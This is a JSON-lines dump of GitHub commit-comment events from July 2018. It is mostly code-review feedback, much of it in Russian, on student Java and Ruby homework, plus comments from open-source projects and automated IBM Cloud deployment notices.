{"id":"8034241139","type":"CommitCommentEvent","actor":{"login":"nschneid"},"repo":{"name":"nert-gu/Xposition"},"payload":{"comment":{"id":29875153,"position":null,"line":null,"path":null,"commit_id":"b17c7bb88e6ebad8fbb80d6092985f0ed65479d1","created_at":"2018-07-29T16:20:17Z","updated_at":"2018-07-29T16:20:17Z","author_association":"CONTRIBUTOR","body":"Well, I think I have a solution in 1126fd4—unfortunately it uses functionality that requires Django 2.x (`filter` argument to `Count`)."}},"created_at":"2018-07-29T16:20:17Z"}
{"id":"8034241436","type":"CommitCommentEvent","actor":{"login":"pawlosb"},"repo":{"name":"volkv/ogame_debri_fields_finder_userscript"},"payload":{"comment":{"id":29875154,"position":null,"line":null,"path":null,"commit_id":"16ad824f7dfdbb9127be1465ce4694bed1429aaf","created_at":"2018-07-29T16:20:29Z","updated_at":"2018-07-29T16:20:29Z","author_association":"NONE","body":"Please up date. Thanks you."}},"created_at":"2018-07-29T16:20:29Z"}
{"id":"8034241994","type":"CommitCommentEvent","actor":{"login":"DzianisMatveyenka"},"repo":{"name":"denisk10790/JavaLevel1"},"payload":{"comment":{"id":29875156,"position":19,"line":19,"path":"L4_3.java","commit_id":"b8a7bc77e85282f1ec0fabc46f3c51f8e2677f54","created_at":"2018-07-29T16:20:52Z","updated_at":"2018-07-29T16:20:52Z","author_association":"NONE","body":"написано неверно, все поломается при разных размерах массивов"}},"created_at":"2018-07-29T16:20:52Z"}
{"id":"8034242488","type":"CommitCommentEvent","actor":{"login":"VladFiliucov"},"repo":{"name":"dwk5/ruby_basics"},"payload":{"comment":{"id":29875157,"position":79,"line":111,"path":"lesson3/station.rb","commit_id":"acbde6214191cb63076362b0c806ca4c9590daf3","created_at":"2018-07-29T16:21:11Z","updated_at":"2018-07-29T16:21:11Z","author_association":"NONE","body":"Вот эти сообщения нужно везде убирать. Они у нас будут в клиентсокм коде. Нам важен факт того, отработал ли метод, или вернул nil"}},"created_at":"2018-07-29T16:21:11Z"}
{"id":"8034242693","type":"CommitCommentEvent","actor":{"login":"DzianisMatveyenka"},"repo":{"name":"denisk10790/JavaLevel1"},"payload":{"comment":{"id":29875161,"position":20,"line":20,"path":"L4_3.java","commit_id":"b8a7bc77e85282f1ec0fabc46f3c51f8e2677f54","created_at":"2018-07-29T16:21:18Z","updated_at":"2018-07-29T16:21:18Z","author_association":"NONE","body":"до сих пор весь код пишешь в main, все на функции разбивать!"}},"created_at":"2018-07-29T16:21:18Z"}
{"id":"8034242883","type":"CommitCommentEvent","actor":{"login":"mosemister"},"repo":{"name":"mosemister/Ships-2ndGen"},"payload":{"comment":{"id":29875162,"position":89,"line":46,"path":"src/org/ships/block/MovingBlock.java","commit_id":"0995e2895565d92a4fcdf9f5241e0253e89cf203","created_at":"2018-07-29T16:21:26Z","updated_at":"2018-07-29T16:21:26Z","author_association":"OWNER","body":"Move left and right must be removed"}},"created_at":"2018-07-29T16:21:26Z"}
{"id":"8034242891","type":"CommitCommentEvent","actor":{"login":"DzianisMatveyenka"},"repo":{"name":"denisk10790/JavaLevel1"},"payload":{"comment":{"id":29875163,"position":22,"line":22,"path":"L4_3.java","commit_id":"b8a7bc77e85282f1ec0fabc46f3c51f8e2677f54","created_at":"2018-07-29T16:21:26Z","updated_at":"2018-07-29T16:21:26Z","author_association":"NONE","body":"код вообще нигде не форматируешь"}},"created_at":"2018-07-29T16:21:26Z"}
{"id":"8034243147","type":"CommitCommentEvent","actor":{"login":"DzianisMatveyenka"},"repo":{"name":"denisk10790/JavaLevel1"},"payload":{"comment":{"id":29875164,"position":7,"line":7,"path":"L5_1.java","commit_id":"b8a7bc77e85282f1ec0fabc46f3c51f8e2677f54","created_at":"2018-07-29T16:21:38Z","updated_at":"2018-07-29T16:21:38Z","author_association":"NONE","body":"названия переменных с маленькой, код конвеншен"}},"created_at":"2018-07-29T16:21:38Z"}
{"id":"8034243179","type":"CommitCommentEvent","actor":{"login":"sbrannen"},"repo":{"name":"junit-team/junit5"},"payload":{"comment":{"id":29875165,"position":null,"line":null,"path":null,"commit_id":"e89948d0efdaa55a5c88fe7f0be47cd2b3788e43","created_at":"2018-07-29T16:21:40Z","updated_at":"2018-07-29T16:21:40Z","author_association":"MEMBER","body":"👍 "}},"created_at":"2018-07-29T16:21:40Z"}
{"id":"8034243964","type":"CommitCommentEvent","actor":{"login":"DzianisMatveyenka"},"repo":{"name":"denisk10790/JavaLevel1"},"payload":{"comment":{"id":29875166,"position":24,"line":24,"path":"L5_1.java","commit_id":"b8a7bc77e85282f1ec0fabc46f3c51f8e2677f54","created_at":"2018-07-29T16:22:11Z","updated_at":"2018-07-29T16:22:11Z","author_association":"NONE","body":"зачем тебе эта функция, если ты ею не пользуешься?"}},"created_at":"2018-07-29T16:22:11Z"}
{"id":"8034244102","type":"CommitCommentEvent","actor":{"login":"rictorlome"},"repo":{"name":"rictorlome/gogochess"},"payload":{"comment":{"id":29875167,"position":33,"line":33,"path":"minimax.go","commit_id":"bdf594b0a4410d71ffc2422fc0198d1f99c8202b","created_at":"2018-07-29T16:22:17Z","updated_at":"2018-07-29T16:22:17Z","author_association":"OWNER","body":"Dave, I agree that there is a missing basecase. The problem is: if you find checkmate, you want to add it to the path. Otherwise the `Bestpath` will never contain the actual checkmate.  \r\n\r\nI added that, but I also initialized the `Best` value to be the opposite of what we are searching for, instead of 0, otherwise it doesn't work. Not sure why yet."}},"created_at":"2018-07-29T16:22:17Z"}
{"id":"8034244143","type":"CommitCommentEvent","actor":{"login":"VladFiliucov"},"repo":{"name":"dwk5/ruby_basics"},"payload":{"comment":{"id":29875168,"position":76,"line":109,"path":"lesson3/station.rb","commit_id":"acbde6214191cb63076362b0c806ca4c9590daf3","created_at":"2018-07-29T16:22:19Z","updated_at":"2018-07-29T16:22:19Z","author_association":"NONE","body":"Вот тело с 107-109 строку сделано идеально. Исправить проверку с elsif на if и убрать все остальное - будет правильный метод"}},"created_at":"2018-07-29T16:22:19Z"}
{"id":"8034254484","type":"CommitCommentEvent","actor":{"login":"Kush5900"},"repo":{"name":"Kush5900/oproject"},"payload":{"comment":{"id":29875206,"position":null,"line":null,"path":null,"commit_id":"b923f184ac5c834de95d3e6c4b59f20dd1a67a2e","created_at":"2018-07-29T16:29:39Z","updated_at":"2018-07-29T16:29:39Z","author_association":"OWNER","body":"@mucyomiller  fixed it by \"git rm .env cached\" :)"}},"created_at":"2018-07-29T16:29:39Z"}
{"id":"8034254580","type":"CommitCommentEvent","actor":{"login":"DzianisMatveyenka"},"repo":{"name":"Valentin0810/JD-2018-07-09"},"payload":{"comment":{"id":29875207,"position":8,"line":8,"path":"src/lesson7/Triangle.java","commit_id":"d886ba27e0baf0c4a2a5e90f07aa36099eb9e2fe","created_at":"2018-07-29T16:29:43Z","updated_at":"2018-07-29T16:29:43Z","author_association":"NONE","body":"периметр всегда рассчитать можно по точкам, а что можно рассчитать - нельзя делать полем класса!"}},"created_at":"2018-07-29T16:29:43Z"}
{"id":"8034256005","type":"CommitCommentEvent","actor":{"login":"bengl"},"repo":{"name":"nodejs/node"},"payload":{"comment":{"id":29875216,"position":19,"line":1281,"path":"src/node_file.cc","commit_id":"57b432c0549dbfe845747dcfe3ac485305de7779","created_at":"2018-07-29T16:30:40Z","updated_at":"2018-07-29T16:30:40Z","author_association":"MEMBER","body":"Whoops."}},"created_at":"2018-07-29T16:30:40Z"}
{"id":"8034256836","type":"CommitCommentEvent","actor":{"login":"DzianisMatveyenka"},"repo":{"name":"Valentin0810/JD-2018-07-09"},"payload":{"comment":{"id":29875217,"position":null,"line":null,"path":null,"commit_id":"d886ba27e0baf0c4a2a5e90f07aa36099eb9e2fe","created_at":"2018-07-29T16:31:18Z","updated_at":"2018-07-29T16:31:18Z","author_association":"NONE","body":"очень многого не насчитал из того, что нужно было сделать по требованиям"}},"created_at":"2018-07-29T16:31:18Z"}
{"id":"8034257698","type":"CommitCommentEvent","actor":{"login":"DzianisMatveyenka"},"repo":{"name":"Valentin0810/JD-2018-07-09"},"payload":{"comment":{"id":29875221,"position":3,"line":3,"path":"src/lesson9/Student.java","commit_id":"b733c8c89a5f87314828b92731796eb36f627104","created_at":"2018-07-29T16:31:54Z","updated_at":"2018-07-29T16:31:54Z","author_association":"NONE","body":"делай отступ между классом и полями"}},"created_at":"2018-07-29T16:31:54Z"}
{"id":"8034259380","type":"CommitCommentEvent","actor":{"login":"bengl"},"repo":{"name":"nodejs/node"},"payload":{"comment":{"id":29875224,"position":33,"line":777,"path":"lib/fs.js","commit_id":"57b432c0549dbfe845747dcfe3ac485305de7779","created_at":"2018-07-29T16:33:01Z","updated_at":"2018-07-29T16:33:01Z","author_association":"MEMBER","body":"I thought about doing that (and it would only break the binding layer, which happens in Node.js all the time). The problem I encountered was: How can I pass that option to `AfterScanDir` for the async case? I'd really like to avoid copying the function and doing `AfterScanDirWtihTypes`."}},"created_at":"2018-07-29T16:33:01Z"}
{"id":"8034259767","type":"CommitCommentEvent","actor":{"login":"DzianisMatveyenka"},"repo":{"name":"Valentin0810/JD-2018-07-09"},"payload":{"comment":{"id":29875225,"position":37,"line":37,"path":"src/lesson9/GradesStudents.java","commit_id":"b733c8c89a5f87314828b92731796eb36f627104","created_at":"2018-07-29T16:33:18Z","updated_at":"2018-07-29T16:33:18Z","author_association":"NONE","body":"не нашел я тут вывод лучшего ученика, выводишь всех"}},"created_at":"2018-07-29T16:33:18Z"}
{"id":"8034260308","type":"CommitCommentEvent","actor":{"login":"DzianisMatveyenka"},"repo":{"name":"Valentin0810/JD-2018-07-09"},"payload":{"comment":{"id":29875229,"position":5,"line":5,"path":"src/lesson9/GradesStudents.java","commit_id":"b733c8c89a5f87314828b92731796eb36f627104","created_at":"2018-07-29T16:33:41Z","updated_at":"2018-07-29T16:33:41Z","author_association":"NONE","body":"отступ между классом и методом"}},"created_at":"2018-07-29T16:33:41Z"}
{"id":"8034260863","type":"CommitCommentEvent","actor":{"login":"DzianisMatveyenka"},"repo":{"name":"Valentin0810/JD-2018-07-09"},"payload":{"comment":{"id":29875230,"position":3,"line":3,"path":"src/lesson9/GradesStudents.java","commit_id":"b733c8c89a5f87314828b92731796eb36f627104","created_at":"2018-07-29T16:34:07Z","updated_at":"2018-07-29T16:34:07Z","author_association":"NONE","body":"не использовать множественный импорт! поправить в настройках идеи, чтобы так не комбинировал, я показывал "}},"created_at":"2018-07-29T16:34:07Z"}
{"id":"8034261516","type":"CommitCommentEvent","actor":{"login":"DzianisMatveyenka"},"repo":{"name":"gordichalex/Homework"},"payload":{"comment":{"id":29875236,"position":4,"line":4,"path":"Lesson9HW/Task2/AverageValueComparator.java","commit_id":"fa4135967c09dcb1ccc202c0917fdeb91be56342","created_at":"2018-07-29T16:34:40Z","updated_at":"2018-07-29T16:34:40Z","author_association":"NONE","body":"отступ между импортами и классом!"}},"created_at":"2018-07-29T16:34:40Z"}
{"id":"8034261689","type":"CommitCommentEvent","actor":{"login":"DzianisMatveyenka"},"repo":{"name":"gordichalex/Homework"},"payload":{"comment":{"id":29875237,"position":10,"line":10,"path":"Lesson9HW/Task2/AverageValueComparator.java","commit_id":"fa4135967c09dcb1ccc202c0917fdeb91be56342","created_at":"2018-07-29T16:34:47Z","updated_at":"2018-07-29T16:34:47Z","author_association":"NONE","body":"до сих пор не форматируешь код!"}},"created_at":"2018-07-29T16:34:47Z"}
{"id":"8034261823","type":"CommitCommentEvent","actor":{"login":"ansleydeakin"},"repo":{"name":"ansleydeakin/acqol-deux"},"payload":{"comment":{"id":29875238,"position":null,"line":null,"path":null,"commit_id":"7adfe4bc206024661c023fc54a8772bbe9427352","created_at":"2018-07-29T16:34:54Z","updated_at":"2018-07-29T16:34:54Z","author_association":"OWNER","body":"IBM Cloud [toolchain](https://console.ng.bluemix.net/devops/toolchains/ebb9fcb3-a4f8-46bb-9dc6-2ec5d208f3b1?env_id=ibm%3Ayp%3Aus-south \"acqol-deux\"): [Delivery Pipeline](https://console.ng.bluemix.net/devops/pipelines/1a74dd51-73bc-4fa3-a136-fcfd99e0daa2?env_id=ibm%3Ayp%3Aus-south \"acqol-deux\") deployed [acqol-deux](https://github.com/ansleydeakin/acqol-deux/releases/tag/deploy-ibm-yp-us-south-ansley-deakin.edu.au-dev-20180729-163453 \"deploy-ibm-yp-us-south-ansley-deakin.edu.au-dev-20180729-163453\") to [dev](https://console.bluemix.net/apps/d8c0e304-cee4-4124-a831-708af13fa45c?env_id=ibm:yp:us-south \"ibm:yp:us-south:ansley@deakin.edu.au:dev\"), including this commit"}},"created_at":"2018-07-29T16:34:54Z"}
{"id":"8034262581","type":"CommitCommentEvent","actor":{"login":"DzianisMatveyenka"},"repo":{"name":"gordichalex/Homework"},"payload":{"comment":{"id":29875240,"position":24,"line":24,"path":"Lesson9HW/Task2/StudentTest.java","commit_id":"fa4135967c09dcb1ccc202c0917fdeb91be56342","created_at":"2018-07-29T16:35:29Z","updated_at":"2018-07-29T16:35:29Z","author_association":"NONE","body":"почему не сортировал с помощью своих компараторов?"}},"created_at":"2018-07-29T16:35:29Z"}
{"id":"8034262591","type":"CommitCommentEvent","actor":{"login":"apapirovski"},"repo":{"name":"nodejs/node"},"payload":{"comment":{"id":29875241,"position":33,"line":777,"path":"lib/fs.js","commit_id":"57b432c0549dbfe845747dcfe3ac485305de7779","created_at":"2018-07-29T16:35:29Z","updated_at":"2018-07-29T16:35:29Z","author_association":"MEMBER","body":"Do they all use the same `req` or does `AfterScanDir` receive some other one? If so, you could set `req.withTypes = true` or something. "}},"created_at":"2018-07-29T16:35:29Z"}
{"id":"8034262911","type":"CommitCommentEvent","actor":{"login":"DzianisMatveyenka"},"repo":{"name":"gordichalex/Homework"},"payload":{"comment":{"id":29875244,"position":37,"line":37,"path":"Lesson9HW/Task2/StudentTest.java","commit_id":"fa4135967c09dcb1ccc202c0917fdeb91be56342","created_at":"2018-07-29T16:35:41Z","updated_at":"2018-07-29T16:35:41Z","author_association":"NONE","body":"нет поиска самого лучшего ученика через итератор"}},"created_at":"2018-07-29T16:35:41Z"}
{"id":"8034264546","type":"CommitCommentEvent","actor":{"login":"DzianisMatveyenka"},"repo":{"name":"Valentin0810/JD-2018-07-09"},"payload":{"comment":{"id":29875252,"position":24,"line":24,"path":"src/lesson9/Task1.java","commit_id":"b733c8c89a5f87314828b92731796eb36f627104","created_at":"2018-07-29T16:36:50Z","updated_at":"2018-07-29T16:36:50Z","author_association":"NONE","body":"создаем утилитный класс для печати коллекций"}},"created_at":"2018-07-29T16:36:50Z"}
{"id":"8034265096","type":"CommitCommentEvent","actor":{"login":"DzianisMatveyenka"},"repo":{"name":"Valentin0810/JD-2018-07-09"},"payload":{"comment":{"id":29875253,"position":41,"line":41,"path":"src/lesson9/Task1.java","commit_id":"b733c8c89a5f87314828b92731796eb36f627104","created_at":"2018-07-29T16:37:13Z","updated_at":"2018-07-29T16:37:13Z","author_association":"NONE","body":"класс с методом main только для тестирования! весь функционал выносим в отдельные классы"}},"created_at":"2018-07-29T16:37:13Z"}
{"id":"8034266981","type":"CommitCommentEvent","actor":{"login":"devshgraphicsprogramming"},"repo":{"name":"Crisspl/IrrlichtBAW"},"payload":{"comment":{"id":29875258,"position":4,"line":37,"path":"include/CConcurrentObjectCache.h","commit_id":"0ecf99025e24c9561d911ac63800192549542819","created_at":"2018-07-29T16:38:25Z","updated_at":"2018-07-29T16:38:25Z","author_association":"NONE","body":"add a move constructor too?"}},"created_at":"2018-07-29T16:38:25Z"}
{"id":"8034267451","type":"CommitCommentEvent","actor":{"login":"max-underthesun"},"repo":{"name":"AlexSytUa/Study"},"payload":{"comment":{"id":29875262,"position":19,"line":19,"path":"Lesson3/route.rb","commit_id":"b3b50dedcec4e9e11b9f259dd3b223a24b08a6ab","created_at":"2018-07-29T16:38:47Z","updated_at":"2018-07-29T16:38:47Z","author_association":"NONE","body":"подумай, что в задании может означать вот эта фраза: \"Имеет начальную и конечную станцию\""}},"created_at":"2018-07-29T16:38:47Z"}
{"id":"8034267493","type":"CommitCommentEvent","actor":{"login":"DzianisMatveyenka"},"repo":{"name":"Valentin0810/JD-2018-07-09"},"payload":{"comment":{"id":29875263,"position":36,"line":36,"path":"src/lesson9/Task1.java","commit_id":"b733c8c89a5f87314828b92731796eb36f627104","created_at":"2018-07-29T16:38:49Z","updated_at":"2018-07-29T16:38:49Z","author_association":"NONE","body":"не использовать итераторы, они устарели, изучаем API классов, которые ты используешь "}},"created_at":"2018-07-29T16:38:49Z"}
{"id":"8034268378","type":"CommitCommentEvent","actor":{"login":"DzianisMatveyenka"},"repo":{"name":"Valentin0810/JD-2018-07-09"},"payload":{"comment":{"id":29875264,"position":30,"line":30,"path":"src/lesson9/Task1.java","commit_id":"b733c8c89a5f87314828b92731796eb36f627104","created_at":"2018-07-29T16:39:27Z","updated_at":"2018-07-29T16:39:27Z","author_association":"NONE","body":"программируем на уровне интерфейсов, а не реализации, поэтому List!"}},"created_at":"2018-07-29T16:39:27Z"}
{"id":"8034268629","type":"CommitCommentEvent","actor":{"login":"devshgraphicsprogramming"},"repo":{"name":"Crisspl/IrrlichtBAW"},"payload":{"comment":{"id":29875268,"position":23,"line":33,"path":"include/CObjectCache.h","commit_id":"0ecf99025e24c9561d911ac63800192549542819","created_at":"2018-07-29T16:39:38Z","updated_at":"2018-07-29T16:39:38Z","author_association":"NONE","body":"change comment about IReferenceCounted"}},"created_at":"2018-07-29T16:39:38Z"}
{"id":"8034269026","type":"CommitCommentEvent","actor":{"login":"DzianisMatveyenka"},"repo":{"name":"Valentin0810/JD-2018-07-09"},"payload":{"comment":{"id":29875269,"position":35,"line":35,"path":"src/lesson9/Task1.java","commit_id":"b733c8c89a5f87314828b92731796eb36f627104","created_at":"2018-07-29T16:39:56Z","updated_at":"2018-07-29T16:39:56Z","author_association":"NONE","body":"никаких магических чисел, все выносим в константы"}},"created_at":"2018-07-29T16:39:56Z"}
{"id":"8034269497","type":"CommitCommentEvent","actor":{"login":"max-underthesun"},"repo":{"name":"AlexSytUa/Study"},"payload":{"comment":{"id":29875270,"position":16,"line":16,"path":"Lesson3/route.rb","commit_id":"b3b50dedcec4e9e11b9f259dd3b223a24b08a6ab","created_at":"2018-07-29T16:40:16Z","updated_at":"2018-07-29T16:40:16Z","author_association":"NONE","body":"наверное лучше \"принт стейшенз\" или \"лист стейшенз\"\r\n\"гет стешенз\" - как-то начинаешь ожидать, что метод что-то возвращает"}},"created_at":"2018-07-29T16:40:16Z"}
{"id":"8034270888","type":"CommitCommentEvent","actor":{"login":"devshgraphicsprogramming"},"repo":{"name":"Crisspl/IrrlichtBAW"},"payload":{"comment":{"id":29875274,"position":77,"line":104,"path":"include/CObjectCache.h","commit_id":"0ecf99025e24c9561d911ac63800192549542819","created_at":"2018-07-29T16:41:11Z","updated_at":"2018-07-29T16:41:11Z","author_association":"NONE","body":"no, this is useful only for std::vector containers, not std::unordered_map \r\n"}},"created_at":"2018-07-29T16:41:11Z"}
{"id":"8034271569","type":"CommitCommentEvent","actor":{"login":"max-underthesun"},"repo":{"name":"AlexSytUa/Study"},"payload":{"comment":{"id":29875276,"position":13,"line":13,"path":"Lesson3/route.rb","commit_id":"b3b50dedcec4e9e11b9f259dd3b223a24b08a6ab","created_at":"2018-07-29T16:41:42Z","updated_at":"2018-07-29T16:41:42Z","author_association":"NONE","body":"ТЗ: \"Может удалять промежуточную станцию из списка\"\r\nэтот метод удалит любую станцию\r\nнадо поправить"}},"created_at":"2018-07-29T16:41:42Z"}
{"id":"8034271979","type":"CommitCommentEvent","actor":{"login":"devshgraphicsprogramming"},"repo":{"name":"Crisspl/IrrlichtBAW"},"payload":{"comment":{"id":29875279,"position":89,"line":113,"path":"include/CObjectCache.h","commit_id":"0ecf99025e24c9561d911ac63800192549542819","created_at":"2018-07-29T16:42:02Z","updated_at":"2018-07-29T16:42:02Z","author_association":"NONE","body":"saame, as the comment for insert!\r\nAlso use std::lower_bound for consistency"}},"created_at":"2018-07-29T16:42:02Z"}
{"id":"8034272752","type":"CommitCommentEvent","actor":{"login":"DzianisMatveyenka"},"repo":{"name":"gordichalex/Homework"},"payload":{"comment":{"id":29875280,"position":6,"line":6,"path":"Lesson9HW/Task1.java","commit_id":"c11bd653d682daa23a91b43dae92bcd7128b41ac","created_at":"2018-07-29T16:42:34Z","updated_at":"2018-07-29T16:42:34Z","author_association":"NONE","body":"весь функционал в методе main! только для тестирования он, выносим в отдельные классы"}},"created_at":"2018-07-29T16:42:34Z"}
{"id":"8034273203","type":"CommitCommentEvent","actor":{"login":"devshgraphicsprogramming"},"repo":{"name":"Crisspl/IrrlichtBAW"},"payload":{"comment":{"id":29875281,"position":98,"line":126,"path":"include/CObjectCache.h","commit_id":"0ecf99025e24c9561d911ac63800192549542819","created_at":"2018-07-29T16:42:54Z","updated_at":"2018-07-29T16:42:54Z","author_association":"NONE","body":"iterative remove_if is slower than a find and then remove/erase at that position"}},"created_at":"2018-07-29T16:42:54Z"}
{"id":"8034273293","type":"CommitCommentEvent","actor":{"login":"berserkingyadis"},"repo":{"name":"Levitanious/tempest-cms"},"payload":{"comment":{"id":29875282,"position":null,"line":null,"path":null,"commit_id":"97a35bf00e9b7bbf9c84b729dedb8681d8c065c7","created_at":"2018-07-29T16:42:58Z","updated_at":"2018-07-29T16:42:58Z","author_association":"COLLABORATOR","body":"Looking good, I approve."}},"created_at":"2018-07-29T16:42:58Z"}
{"id":"8034273304","type":"CommitCommentEvent","actor":{"login":"DzianisMatveyenka"},"repo":{"name":"gordichalex/Homework"},"payload":{"comment":{"id":29875283,"position":22,"line":22,"path":"Lesson9HW/Task1.java","commit_id":"c11bd653d682daa23a91b43dae92bcd7128b41ac","created_at":"2018-07-29T16:42:58Z","updated_at":"2018-07-29T16:42:58Z","author_association":"NONE","body":"никакого хардкода и магических чисел, выносим в константы все"}},"created_at":"2018-07-29T16:42:58Z"}
{"id":"8034274127","type":"CommitCommentEvent","actor":{"login":"max-underthesun"},"repo":{"name":"AlexSytUa/Study"},"payload":{"comment":{"id":29875284,"position":14,"line":14,"path":"Lesson3/station.rb","commit_id":"b3b50dedcec4e9e11b9f259dd3b223a24b08a6ab","created_at":"2018-07-29T16:43:32Z","updated_at":"2018-07-29T16:43:32Z","author_association":"NONE","body":"ТЗ: \"Может возвращать список всех поездов на станции, находящиеся в текущий момент\"\r\n\"возвращать\", а не \"выводить на печать\" \r\nэтот метод работает неверно\r\nну и он в общем-то не нужен, потому что есть ридер `trains_list` (2 строка), который уже выполняет эту функцию  - \"возвращает\" список "}},"created_at":"2018-07-29T16:43:32Z"}
{"id":"8034274220","type":"CommitCommentEvent","actor":{"login":"DzianisMatveyenka"},"repo":{"name":"gordichalex/Homework"},"payload":{"comment":{"id":29875286,"position":7,"line":7,"path":"Lesson9HW/Task1.java","commit_id":"c11bd653d682daa23a91b43dae92bcd7128b41ac","created_at":"2018-07-29T16:43:35Z","updated_at":"2018-07-29T16:43:35Z","author_association":"NONE","body":"Программируем на уровне интерфейсов, а не реализации - поэтому List"}},"created_at":"2018-07-29T16:43:35Z"}
{"id":"8034274466","type":"CommitCommentEvent","actor":{"login":"DzianisMatveyenka"},"repo":{"name":"gordichalex/Homework"},"payload":{"comment":{"id":29875292,"position":7,"line":7,"path":"Lesson9HW/Task1.java","commit_id":"c11bd653d682daa23a91b43dae92bcd7128b41ac","created_at":"2018-07-29T16:43:45Z","updated_at":"2018-07-29T16:43:45Z","author_association":"NONE","body":"В данном задании лучше было выбрать LinkedList"}},"created_at":"2018-07-29T16:43:45Z"}
{"id":"8034274799","type":"CommitCommentEvent","actor":{"login":"bKrystev"},"repo":{"name":"bKrystev/SimplyMeBS"},"payload":{"comment":{"id":29875294,"position":null,"line":null,"path":null,"commit_id":"ded6564a03f663083c19ab0c08c9fbf1050cef9a","created_at":"2018-07-29T16:44:01Z","updated_at":"2018-07-29T16:44:01Z","author_association":"OWNER","body":"Started learning algorithms... so far so difficult"}},"created_at":"2018-07-29T16:44:01Z"}
{"id":"8034275080","type":"CommitCommentEvent","actor":{"login":"max-underthesun"},"repo":{"name":"AlexSytUa/Study"},"payload":{"comment":{"id":29875295,"position":18,"line":18,"path":"Lesson3/station.rb","commit_id":"b3b50dedcec4e9e11b9f259dd3b223a24b08a6ab","created_at":"2018-07-29T16:44:12Z","updated_at":"2018-07-29T16:44:12Z","author_association":"NONE","body":"см. выше\r\n\"путс\" здесь лишний, нужно чтобы метод \"возвращал\", а не \"печатал\""}},"created_at":"2018-07-29T16:44:12Z"}
{"id":"8034275271","type":"CommitCommentEvent","actor":{"login":"tarsius"},"repo":{"name":"magit/magit"},"payload":{"comment":{"id":29875296,"position":null,"line":null,"path":null,"commit_id":"9cffb423948f0719822413ab75223681aff994bc","created_at":"2018-07-29T16:44:20Z","updated_at":"2018-07-29T16:44:20Z","author_association":"MEMBER","body":"Wow, I just committed way to much. Can't remember the last time that happened."}},"created_at":"2018-07-29T16:44:20Z"}
{"id":"8034275911","type":"CommitCommentEvent","actor":{"login":"devshgraphicsprogramming"},"repo":{"name":"Crisspl/IrrlichtBAW"},"payload":{"comment":{"id":29875301,"position":null,"line":null,"path":null,"commit_id":"0ecf99025e24c9561d911ac63800192549542819","created_at":"2018-07-29T16:44:47Z","updated_at":"2018-07-29T16:44:47Z","author_association":"NONE","body":"bonus, is there any need for CConcurentObjectCache::contains?"}},"created_at":"2018-07-29T16:44:47Z"}
{"id":"8034276060","type":"CommitCommentEvent","actor":{"login":"Medhashah"},"repo":{"name":"Medhashah/Multiclass-classification-of-imbalanced-datastreams"},"payload":{"comment":{"id":29875302,"position":null,"line":null,"path":null,"commit_id":"ba2dc0aa061e1290be9038705dd7aa706ab960f2","created_at":"2018-07-29T16:44:54Z","updated_at":"2018-07-29T16:44:54Z","author_association":"OWNER","body":"The project proposes HECMI (Hybrid Ensemble technique for Classification of Multiclass Imbalanced data) to deal with the problem of multiclass imbalance data which has more than one majority and minority class.HECMI is generic in nature and can be used for any domain.It is a hybrid of data based and algorithm based method for imbalanced data.The base classifier of the ensemble is selected\r\nfrom the existing traditional models with the best cross-validation score. The data is initially partitioned into n parts for n iterations.A data-based approach of oversampling minority class instances is used to balance the data in iterations.The class with least recall is the one misclassified the most and should be paid attention by the classifier.Instances of this class are oversampled and added to the next data part in training.Also, the instances of classes with recall less than threshold are added to the next data part.Final prediction is done by taking the majority of votes of the classifiers."}},"created_at":"2018-07-29T16:44:54Z"}
{"id":"8034276282","type":"CommitCommentEvent","actor":{"login":"Lisss13"},"repo":{"name":"Lisss13/courses"},"payload":{"comment":{"id":29875304,"position":18,"line":18,"path":"2/day_of_year.rb","commit_id":"c11f7c37f3e9417c2e5b9cfbcc23dfa078d69981","created_at":"2018-07-29T16:45:03Z","updated_at":"2018-07-29T16:45:03Z","author_association":"OWNER","body":"исправил, в прошлый раз забыл "}},"created_at":"2018-07-29T16:45:03Z"}
{"id":"8034276953","type":"CommitCommentEvent","actor":{"login":"max-underthesun"},"repo":{"name":"AlexSytUa/Study"},"payload":{"comment":{"id":29875308,"position":17,"line":17,"path":"Lesson3/train.rb","commit_id":"b3b50dedcec4e9e11b9f259dd3b223a24b08a6ab","created_at":"2018-07-29T16:45:29Z","updated_at":"2018-07-29T16:45:29Z","author_association":"NONE","body":"опять путанница с \"возвращать\" / \"вывдить\"\r\nи опять же этот метод не нужен, потому что есть геттер `speed`"}},"created_at":"2018-07-29T16:45:29Z"}
{"id":"8034277352","type":"CommitCommentEvent","actor":{"login":"ansleydeakin"},"repo":{"name":"ansleydeakin/acqol-deux"},"payload":{"comment":{"id":29875312,"position":null,"line":null,"path":null,"commit_id":"d81ff84f819a535a94ba73cdd17f8486df0d7dec","created_at":"2018-07-29T16:45:48Z","updated_at":"2018-07-29T16:45:48Z","author_association":"OWNER","body":"IBM Cloud [toolchain](https://console.ng.bluemix.net/devops/toolchains/ebb9fcb3-a4f8-46bb-9dc6-2ec5d208f3b1?env_id=ibm%3Ayp%3Aus-south \"acqol-deux\"): [Delivery Pipeline](https://console.ng.bluemix.net/devops/pipelines/1a74dd51-73bc-4fa3-a136-fcfd99e0daa2?env_id=ibm%3Ayp%3Aus-south \"acqol-deux\") deployed [acqol-deux](https://github.com/ansleydeakin/acqol-deux/releases/tag/deploy-ibm-yp-us-south-ansley-deakin.edu.au-dev-20180729-164547 \"deploy-ibm-yp-us-south-ansley-deakin.edu.au-dev-20180729-164547\") to [dev](https://console.bluemix.net/apps/d8c0e304-cee4-4124-a831-708af13fa45c?env_id=ibm:yp:us-south \"ibm:yp:us-south:ansley@deakin.edu.au:dev\"), including this commit"}},"created_at":"2018-07-29T16:45:48Z"}
{"id":"8034278324","type":"CommitCommentEvent","actor":{"login":"DzianisMatveyenka"},"repo":{"name":"zhenyadubin/HomeWork"},"payload":{"comment":{"id":29875313,"position":11,"line":11,"path":"src/lesson7/Shape.java","commit_id":"ff1792bb7d1448cee43870f6d2d20471d05d3424","created_at":"2018-07-29T16:46:29Z","updated_at":"2018-07-29T16:46:29Z","author_association":"NONE","body":"никакого вывода на консоль, должен возвращать true-false метод"}},"created_at":"2018-07-29T16:46:29Z"}
